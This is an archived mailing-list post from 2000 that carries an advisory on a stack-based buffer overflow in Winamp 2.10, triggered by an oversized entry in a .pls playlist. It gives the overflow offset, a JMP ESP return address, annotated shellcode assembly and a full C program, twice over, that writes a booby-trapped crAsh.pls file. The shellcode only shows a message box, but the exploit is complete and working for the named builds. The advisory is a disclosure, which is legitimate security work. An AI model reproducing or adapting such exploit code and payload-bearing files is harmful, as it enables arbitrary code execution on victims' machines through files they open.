Buffer overflow with WinAmp 2.10

From: Transfer Interrupted (t-iat_private)
Date: Sun Jan 09 2000 - 02:21:31 PST


    This message is in MIME format
    --_=XFMail.1.4.0.Linux:000109112131:762=_
    Content-Type: text/plain; charset=us-ascii
    
    Hi!
    There's a stack-based buffer overflow in WinAmp 2.10 (Win 98) which allows a user to
    execute arbitrary code. Here's the source code and a fuller write-up.
    
    Be careful,
    
    Transfer Interrupted
    
    
    
    --
    "This vulnerability is completely theoretical!"
    -Microsoft
    
    --_=XFMail.1.4.0.Linux:000109112131:762=_
    Content-Disposition: attachment; filename="winamp.win98.txt"
    Content-Transfer-Encoding: 7bit
    Content-Description: winamp.win98.txt
    Content-Type: text/plain;
     charset=us-ascii; name=winamp.win98.txt; SizeOnDisk=13229
    
    Author: Steve Fewer, darkplanat_private
                         http://indigo.ie/~lmf
    
    Introduction:
    
    I recently uncovered a stack-based buffer overflow in Winamp
    version 2.10 which lets me execute arbitrary code. It is
    triggered through .pls files, which Winamp uses for playlists, and
    fires as soon as the playlist is loaded. This is unnerving because
    swapping playlists with someone on IRC during an mp3 trading
    session is an entirely plausible way of delivering such a file.
    
    The overflow occurs when an entry longer than 580 bytes is
    read in from a .pls file. The four bytes that follow the first 580
    overwrite the saved return address, so EIP is the only register
    the attacker controls; from there on is space for your shell code. e.g.
    
    [playlist]
    File1=<580 bytes><eip><shell code>
    NumberOfEntries=1
    
    The first 580 bytes get mangled around in memory, but at the moment
    of the return ESP points at the 585th byte (where our shell code
    starts), so a simple 'JMP ESP' or the like will land us back in
    our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in
    comctl32.dll, which Winamp loads. Pointing the saved EIP at that
    address lands us back where we want to be. Note that this address,
    like the ones below, is absolute and was taken from the DLL build on
    the system tested; it will differ on other builds.
    
    This was all created/tested on Windows 98 [Version 4.10.1998]
    running on an Intel PII400 with 128MB RAM.
    
    
    The Shell Code:
    
    The shell code I wrote for this simply displays a message box
    and then calls exit(). However, Winamp doesn't load msvcrt.dll,
    which is needed to call exit(), so we have to load it ourselves.
    I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
    LoadLibraryA(). For calling MessageBox I used the address
    0xBFF5412E in user32.dll (v4.10.1998), and for calling exit() I
    used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). I did
    not think it worth resolving these with GetProcAddress for the sake
    of compatibility, so the payload is hard-wired to those exact DLL
    versions: on any other build the addresses will differ and the
    payload will most likely crash rather than run.
    For the OP codes see the exploit further on.
    
        // NOTE(review): every address below is absolute and taken from the
        // Win98 4.10.1998 DLL builds named in the advisory; nothing is resolved
        // at run time, so the payload only works on those exact builds.
        //
        // This loads msvcrt.dll
        // Three pushes of a zeroed eax leave 12 zero bytes at [ebp-0Ch..ebp-01h];
        // the ten bytes of "MSVCRT.DLL" fill [ebp-0Ch..ebp-03h] and the two
        // untouched zero bytes after them terminate the string.
        push ebp
        mov ebp,esp
        xor eax,eax
        push eax
        push eax
        push eax
        mov byte ptr[ebp-0Ch],4Dh   // 'M'
        mov byte ptr[ebp-0Bh],53h   // 'S'
        mov byte ptr[ebp-0Ah],56h   // 'V'
        mov byte ptr[ebp-09h],43h   // 'C'
        mov byte ptr[ebp-08h],52h   // 'R'
        mov byte ptr[ebp-07h],54h   // 'T'
        mov byte ptr[ebp-06h],2Eh   // '.'
        mov byte ptr[ebp-05h],44h   // 'D'
        mov byte ptr[ebp-04h],4Ch   // 'L'
        mov byte ptr[ebp-03h],4Ch   // 'L'
        // The LoadLibraryA address (kernel32.dll) is parked at [ebp-10h] and
        // the pointer to "MSVCRT.DLL" (ebp-0Ch) is pushed as its one argument.
        mov edx,0xBFF776D4
        push edx
        lea eax,[ebp-0Ch]
        push eax
        call dword ptr[ebp-10h]
        // This calls MessageBox to say 'Hi!'
        // push edi (zero) reserves [ebp-04h..ebp-01h]; 'H','i','!' fill the
        // first three bytes and the fourth stays zero as the terminator.
        push ebp
        mov ebp,esp
        xor edi,edi
        push edi
        mov byte ptr[ebp-04h],48h   // 'H'
        mov byte ptr[ebp-03h],69h   // 'i'
        mov byte ptr[ebp-02h],21h   // '!'
        // The MessageBox address (user32.dll) is parked at [ebp-08h]; the four
        // pushes that follow are its arguments -- presumably type=0, caption
        // and text both pointing at "Hi!", and hWnd=0, in right-to-left order.
        mov edx, 0xBFF5412E
        push edx
        push edi
        lea edx,[ebp-04h]
        push edx
        push edx
        push edi
        call dword ptr[ebp-08h]
        // This calls exit()
        // 0xFFFFFFFF - 0x87FFAAFB = 0x78005504, the exit() address in msvcrt.dll.
        // It is computed instead of loaded as an immediate because 0x78005504
        // contains a 0x00 byte, which would end the string the exploit writes
        // with "%s" (and hence the .pls entry) early.
        push ebp
        mov ebp,esp
        mov edx,0xFFFFFFFF
        sub edx,0x87FFAAFB
        push edx
        xor eax,eax
        push eax
        call dword ptr[ebp-04h]   // exit(0)
    
    The Exploit:
    
    <-snip->
    
    /* Stack based buffer overflow exploit for Winamp v2.10
     * Author Steve Fewer, 04-01-2k. Mail me at darkplanat_private
     *
     * For a detailed description on the exploit see my advisory.
     *
     * Tested with Winamp v2.10 using Windows98 on an Intel
     * PII 400 with 128MB RAM
     *
     * http://indigo.ie/~lmf
     */
    
    #include <stdio.h>
    
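    /* Write exactly n bytes of p to f; returns 0 on success, -1 on a short write. */
    static int put_bytes(FILE *f, const void *p, size_t n)
    {
        return fwrite(p, 1, n, f) == n ? 0 : -1;
    }

    /* Build crAsh.pls: a one-entry playlist whose File1= value is laid out as
     * the advisory describes -- 580 bytes of NOP sled, the 4-byte saved return
     * address (overwritten with the JMP ESP in comctl32.dll), then the payload.
     * Returns 0 on success, 1 if the file could not be created or written. */
    int main(void)
    {
        enum { SLED_LEN = 580 };

        /* 0xBFB9CFF7 little-endian: the JMP ESP in comctl32.dll (Win98 4.10.1998). */
        static const unsigned char eip[4] = { 0xF7, 0xCF, 0xB9, 0xBF };

        /* Payload, byte-for-byte the opcodes of the listing in the advisory:
         * LoadLibraryA("MSVCRT.DLL"), MessageBox with "Hi!", then exit(0).
         * All addresses are absolute and tied to the Win98 4.10.1998 DLLs.
         * The exit() address is formed as 0xFFFFFFFF-0x87FFAAFB because the
         * immediate 0x78005504 contains a 0x00 byte; as a result no byte of
         * the payload is 0x00, which is what lets it survive as a C string. */
        static const char sploit[] =
            /* push ebp; mov ebp,esp; xor eax,eax; push eax x3; build "MSVCRT.DLL" at [ebp-0Ch] */
            "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
            "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
            "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"
            /* mov edx,0xBFF776D4 (LoadLibraryA); push edx; lea eax,[ebp-0Ch]; push eax; call [ebp-10h] */
            "\xBA\xD4\x76\xF7\xBF\x52\x8D\x45\xF4\x50\xFF\x55\xF0"
            /* push ebp; mov ebp,esp; xor edi,edi; push edi; build "Hi!" at [ebp-04h] */
            "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"
            /* mov edx,0xBFF5412E (MessageBox); push edx; push edi; lea edx,[ebp-04h]; push edx x2; push edi; call [ebp-08h] */
            "\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8"
            /* push ebp; mov ebp,esp; mov edx,0xFFFFFFFF; sub edx,0x87FFAAFB; push edx; xor eax,eax; push eax; call [ebp-04h] */
            "\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

        unsigned char sled[SLED_LEN];
        FILE *file;
        size_t i;
        int failed;

        printf("\n\n\t\t.......................................\n");
        printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
        printf("\t\t.......................................\n");
        printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
        printf("\t\t.........http://indigo.ie/~lmf.........\n");
        printf("\t\t.......................................\n\n");

        for (i = 0; i < SLED_LEN; i++) {
            sled[i] = 0x90;   /* NOP */
        }

        file = fopen("crAsh.pls", "wb");
        if (file == NULL) {
            perror("crAsh.pls");
            return 1;
        }

        /* Every write carries an explicit length. Printing the sled with "%s"
         * from a buffer that is never NUL-terminated would make the bytes
         * between the 580 NOPs and the return address depend on stack garbage,
         * and with them the offset the whole exploit relies on. */
        failed = put_bytes(file, "[playlist]\n", sizeof "[playlist]\n" - 1)
              || put_bytes(file, "File1=", sizeof "File1=" - 1)
              || put_bytes(file, sled, sizeof sled)
              || put_bytes(file, eip, sizeof eip)
              || put_bytes(file, sploit, sizeof sploit - 1)
              || put_bytes(file, "\nNumberOfEntries=1", sizeof "\nNumberOfEntries=1" - 1);
        if (fclose(file) != 0) {
            failed = 1;
        }
        if (failed) {
            fprintf(stderr, "crAsh.pls: write error\n");
            return 1;
        }

        printf("\t     created file crAsh.pls loaded with the exploit.\n");
        return 0;
    }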
    
    <-snip->
    
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    
    ------=_NextPart_000_0029_01BF56CF.4A7BA760
    Content-Type: text/html;
    	charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META content=3D"text/html; charset=3Diso-8859-1" =
    http-equiv=3DContent-Type>
    <META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
    <STYLE></STYLE>
    </HEAD>
    <BODY bgColor=3D#ffffff>
    <DIV><FONT face=3DArial size=3D2>Nullsoft Winamp 2.10 buffer overflow=20
    advisory<BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=
    =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR>Author:=20
    Steve Fewer, <A=20
    href=3D"mailto:darkplanat_private">darkplanat_private</A><BR>&nbs=
    p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
    ;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
    <A=20
    href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf</A><BR>-=3D-=3D-=3D-=
    =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
    -=3D-=3D-=3D-=3D-=3D-=3D</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>Introduction:</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>I recently uncovered a stack based =
    buffer overflow=20
    in winamp<BR>version 2.10 which lets me execute 'arbitrary code'. It is=20
    <BR>carried out through .pls files which winamp uses for playlists. =
    <BR>This is=20
    unnerving as it is a feasible plan to trade playlists on<BR>irc during a =
    mp3=20
    trading session with someone.</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>The overflow occurs when an entry =
    greater than 580=20
    bytes is <BR>read in from a .pls file. The EIP is the only register =
    overwritten=20
    <BR>in the next four bytes that follow, from there on is space for =
    <BR>your=20
    shell code. eg.</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>[playlist]<BR>File1=3D&lt;580=20
    bytes&gt;&lt;eip&gt;&lt;shell code&gt;<BR>NumberOfEntries=3D1&nbsp; =
    </FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>The first 580 bytes get mangled around =
    in memory=20
    but the 585 <BR>byte (where our shell code starts) is pointed to by the =
    ESP,=20
    <BR>therefore a simple 'JMP ESP' or the like will land us back in =
    <BR>our shell=20
    code. I used a 'JMP ESP' at address 0xBFB9CFF7 in <BR>comctl32.dll which =
    winamp=20
    loads. Pointing our EIP into that <BR>address lands us back where we =
    want to be.=20
    </FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>This was all created/tested on Windows =
    98 [Version=20
    4.10.1998]<BR>running on an Intel PII400 with 128MB RAM.</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2><BR>The Shell Code:</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>The shell code I wrote for this simply =
    displays a=20
    message box <BR>and then calls exit(). However Winamp doesn't load =
    msvcrt.dll=20
    <BR>which is needed to call exit() so we have to load it ourselves. =
    <BR>I used=20
    the address 0xBFF776D4 in kernel32.dll (v4.10.1998) =
    for<BR>LoadLibraryA(). For=20
    calling Messagebox I used the address <BR>0xBFF5412E in user32.dll =
    (v4.10.1998)=20
    and for calling exit() I <BR>used the address 0x78005504 in msvcrt.dll=20
    (v6.00.8397.0). It <BR>didn't warrant using GetProcAddress for =
    compatibilities=20
    sake.<BR>For the OP codes see the exploit further on.</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp; // This loads=20
    msvcrt.dll<BR>&nbsp;&nbsp;&nbsp; push ebp<BR>&nbsp;&nbsp;&nbsp; mov=20
    ebp,esp<BR>&nbsp;&nbsp;&nbsp; xor eax,eax<BR>&nbsp;&nbsp;&nbsp; push=20
    eax<BR>&nbsp;&nbsp;&nbsp; push eax<BR>&nbsp;&nbsp;&nbsp; push=20
    eax<BR>&nbsp;&nbsp;&nbsp; mov byte =
    ptr[ebp-0Ch],4Dh<BR>&nbsp;&nbsp;&nbsp; mov=20
    byte ptr[ebp-0Bh],53h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-0Ah],56h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-09h],43h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-08h],52h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-07h],54h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-06h],2Eh<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-05h],44h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-04h],4Ch<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-03h],4Ch<BR>&nbsp;&nbsp;&nbsp; mov =
    edx,0xBFF776D4<BR>&nbsp;&nbsp;&nbsp;=20
    push edx<BR>&nbsp;&nbsp;&nbsp; lea eax,[ebp-0Ch]<BR>&nbsp;&nbsp;&nbsp; =
    push=20
    eax<BR>&nbsp;&nbsp;&nbsp; call dword ptr[ebp-10h]<BR>&nbsp;&nbsp;&nbsp; =
    // This=20
    calls MessageBox to say 'Hi!'<BR>&nbsp;&nbsp;&nbsp; push=20
    ebp<BR>&nbsp;&nbsp;&nbsp; mov ebp,esp<BR>&nbsp;&nbsp;&nbsp; xor=20
    edi,edi<BR>&nbsp;&nbsp;&nbsp; push edi<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-04h],48h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-03h],69h<BR>&nbsp;&nbsp;&nbsp; mov byte=20
    ptr[ebp-02h],21h<BR>&nbsp;&nbsp;&nbsp; mov edx, =
    0xBFF5412E<BR>&nbsp;&nbsp;&nbsp;=20
    push edx<BR>&nbsp;&nbsp;&nbsp; push edi<BR>&nbsp;&nbsp;&nbsp; lea=20
    edx,[ebp-04h]<BR>&nbsp;&nbsp;&nbsp; push edx<BR>&nbsp;&nbsp;&nbsp; push=20
    edx<BR>&nbsp;&nbsp;&nbsp; push edi<BR>&nbsp;&nbsp;&nbsp; call dword=20
    ptr[ebp-08h]<BR>&nbsp;&nbsp;&nbsp; // This calls =
    exit()<BR>&nbsp;&nbsp;&nbsp;=20
    push ebp<BR>&nbsp;&nbsp;&nbsp; mov ebp,esp<BR>&nbsp;&nbsp;&nbsp; mov=20
    edx,0xFFFFFFFF<BR>&nbsp;&nbsp;&nbsp; sub =
    edx,0x87FFAAFB<BR>&nbsp;&nbsp;&nbsp;=20
    push edx<BR>&nbsp;&nbsp;&nbsp; xor eax,eax<BR>&nbsp;&nbsp;&nbsp; push=20
    eax<BR>&nbsp;&nbsp;&nbsp; call dword ptr[ebp-04h]</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>The Exploit:</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>&lt;-snip-&gt;</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>/* Stack based buffer overflow exploit =
    for Winamp=20
    v2.10<BR>&nbsp;* Author Steve Fewer, 04-01-2k. Mail me at <A=20
    href=3D"mailto:darkplanat_private">darkplanat_private</A><BR>&nbs=
    p;*<BR>&nbsp;*=20
    For a detailed description on the exploit see my =
    advisory.<BR>&nbsp;*<BR>&nbsp;*=20
    Tested with Winamp v2.10 using Windows98 on an Intel<BR>&nbsp;* PII 400 =
    with=20
    128MB RAM<BR>&nbsp;*<BR>&nbsp;* <A=20
    href=3D"http://indigo.ie/~lmf">http://indigo.ie/~lmf><BR>&nbsp;*/</FON=
    T></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>#include &lt;stdio.h&gt;</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>int main()<BR>{</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp;=20
    printf("\n\n\t\t.......................................\n");<BR>&nbsp;&nb=
    sp;&nbsp;=20
    printf("\t\t......Nullsoft Winamp 2.10 =
    exploit.....\n");<BR>&nbsp;&nbsp;&nbsp;=20
    printf("\t\t.......................................\n");<BR>&nbsp;&nbsp;&=
    nbsp;=20
    printf("\t\t.....Author: Steve Fewer, =
    04-01-2k.....\n");<BR>&nbsp;&nbsp;&nbsp;=20
    printf("\t\t.........http://indigo.ie/~lmf.........\n");<BR>&nbsp;&nbsp;&=
    nbsp;=20
    printf("\t\t.......................................\n\n");</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>char buffer[640];<BR>char eip[8] =3D=20
    "\xF7\xCF\xB9\xBF";<BR>char sploit[256] =3D=20
    "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53<BR>\xC6=
    \x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\=
    x2E\xC6<BR>\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x=
    bF\x52\x8D\x45\xF4\x50<BR>\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF=
    C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21<BR>\xBA\x2E\x41\xF5\xBF\x52\x57\x8D=
    \x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF<BR>\xFF\xFF\xFF\x81\=
    xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>FILE *file;</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp; for(int=20
    x=3D0;x&lt;580;x++)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp; =
    buffer[x] =3D=20
    0x90;<BR>&nbsp;&nbsp;&nbsp; }</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>file =3D =
    fopen("crAsh.pls","wb");</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>fprintf(file, =
    "[playlist]\n");<BR>fprintf(file,=20
    "File1=3D");<BR>fprintf(file, "%s", buffer);<BR>fprintf(file, "%s",=20
    eip);<BR>fprintf(file, "%s", sploit);<BR>fprintf(file,=20
    "\nNumberOfEntries=3D1");</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial =
    size=3D2>fclose(file);<BR>printf("\t&nbsp;&nbsp;&nbsp;&nbsp;=20
    created file crAsh.pls loaded with the exploit.\n");<BR>return=20
    0;<BR>}</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial size=3D2>&lt;-snip-&gt;</FONT></DIV>
    <DIV>&nbsp;</DIV>
    <DIV><FONT face=3DArial=20
    size=3D2><BR>-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
    -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D<BR></FONT></DIV></BO=
    DY></HTML>
    
    ------=_NextPart_000_0029_01BF56CF.4A7BA760--
    
    
    
    --_=XFMail.1.4.0.Linux:000109112131:762=_--
    


